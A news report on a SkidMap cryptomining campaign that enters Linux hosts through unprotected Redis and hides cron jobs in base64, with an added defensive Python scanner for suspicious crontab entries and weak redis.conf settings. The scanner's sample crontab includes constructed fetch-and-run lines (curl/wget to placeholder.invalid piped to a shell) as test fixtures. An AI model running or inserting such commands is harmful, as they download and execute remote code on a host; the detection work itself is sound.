A new campaign using the SkidMap malware targets numerous Linux distributions, including Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock. The attackers first brute-force their way into unprotected Redis instances, then set variables whose base64-encoded contents hide the cron jobs that carry the infection forward.
Malicious kernel modules have been added to the malware, first identified in September 2019 as a cryptocurrency-mining botnet, to help it evade detection. During their investigation, Trustwave analysts found at least two Linux variants of SkidMap that affect the infection flow: the first targets Debian/Ubuntu and the second RedHat/CentOS.
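The two conditions the campaign relies on, a Redis instance reachable without proper authentication and cron entries whose real command sits behind a base64 string, are both things a defender can check on a host. The script below is an added example, not Trustwave's code and not derived from any SkidMap sample: it flags crontab lines that decode base64 into a shell (or that carry an opaque base64 blob) and reports the redis.conf settings that leave an instance open (no requirepass, protected-mode off, bound to every interface). The crontab lines, the redis.conf fragments and the placeholder.invalid host are constructed for the example, and "unprotected" is assumed here to mean no password and an exposed bind address.

```python
"""Defender-side checks for an exposed Redis instance and for cron entries that
hide their command behind base64. Added example; not Trustwave's code and not
derived from any SkidMap sample."""
import base64
import re
from typing import Dict, List

# An explicit decode-then-execute chain, e.g. "... | base64 -d | sh"
DECODE_EXEC_RE = re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:sh|bash|dash)\b")
# A standalone base64-looking token long enough to carry a command
B64_TOKEN_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{32,}={0,2}(?![A-Za-z0-9+/=])")
# Words that mark decoded text as a shell command rather than benign data
SHELL_HINT_RE = re.compile(r"\b(?:sh|bash|dash|curl|wget|chmod)\b|\|")


def _try_decode(token: str) -> str:
    """Return the decoded text if token is valid base64 of printable text, else ''."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return ""
    return text if all(c.isprintable() or c in "\n\t" for c in text) else ""


def scan_crontab(text: str) -> List[Dict[str, object]]:
    """Flag cron entries that decode base64 into a shell or carry an opaque base64 blob."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons: List[str] = []
        decoded = ""
        if DECODE_EXEC_RE.search(entry):
            reasons.append("decodes base64 and pipes it into a shell")
        for match in B64_TOKEN_RE.finditer(entry):
            decoded = _try_decode(match.group(0))
            if decoded:  # stop at the first token that decodes to readable text
                reasons.append("base64 payload decodes to a shell command"
                               if SHELL_HINT_RE.search(decoded) else "opaque base64 payload")
                break
        if reasons:
            findings.append({"line": lineno, "entry": entry,
                             "reasons": reasons, "decoded": decoded})
    return findings


def check_redis_conf(conf: str) -> List[str]:
    """Return the hardening gaps in a redis.conf text that leave the instance exposed."""
    settings: Dict[str, str] = {}
    for line in conf.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if line:
            key, _, value = line.partition(" ")
            settings[key.lower()] = value.strip()
    gaps: List[str] = []
    if not settings.get("requirepass"):
        gaps.append("no requirepass: any client that reaches the port can run commands")
    if settings.get("protected-mode", "yes").lower() == "no":
        gaps.append("protected-mode no: unauthenticated remote clients are not refused")
    bind = settings.get("bind", "").split()
    if not bind or "0.0.0.0" in bind or "*" in bind:
        gaps.append("bind missing or 0.0.0.0: instance listens on every interface")
    return gaps


def _b64(cmd: str) -> str:
    return base64.b64encode(cmd.encode()).decode()


# Constructed sample crontab; placeholder.invalid is a placeholder host, not an indicator
SAMPLE_CRONTAB = "\n".join([
    "# constructed sample crontab",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    f"*/5 * * * * echo {_b64('curl -s http://placeholder.invalid/x.sh | sh')} | base64 -d | sh",
    "15 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf",
    f"*/10 * * * * echo {_b64('wget -qO- http://placeholder.invalid/y | bash')} | base64 --decode | bash",
])

# Constructed redis.conf fragments: the weak settings beside their corrected form
WEAK_REDIS_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_REDIS_CONF = ("bind 127.0.0.1\nprotected-mode yes\nport 6379\n"
                       "requirepass CHANGE-ME-placeholder\n")

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {'; '.join(f['reasons'])}\n    {f['entry']}\n    decoded: {f['decoded']}")
    for name, conf in (("weak", WEAK_REDIS_CONF), ("hardened", HARDENED_REDIS_CONF)):
        print(f"{name} redis.conf gaps: {check_redis_conf(conf) or 'none'}")
```

On a real host, feed scan_crontab the contents of /etc/crontab, each file under /etc/cron.d and the per-user spool files, and feed check_redis_conf the running server's redis.conf. A base64 string in cron is not proof of compromise on its own, but a decode-and-pipe-to-shell entry has no legitimate reason to exist on most systems and should be reviewed together with the Redis exposure findings.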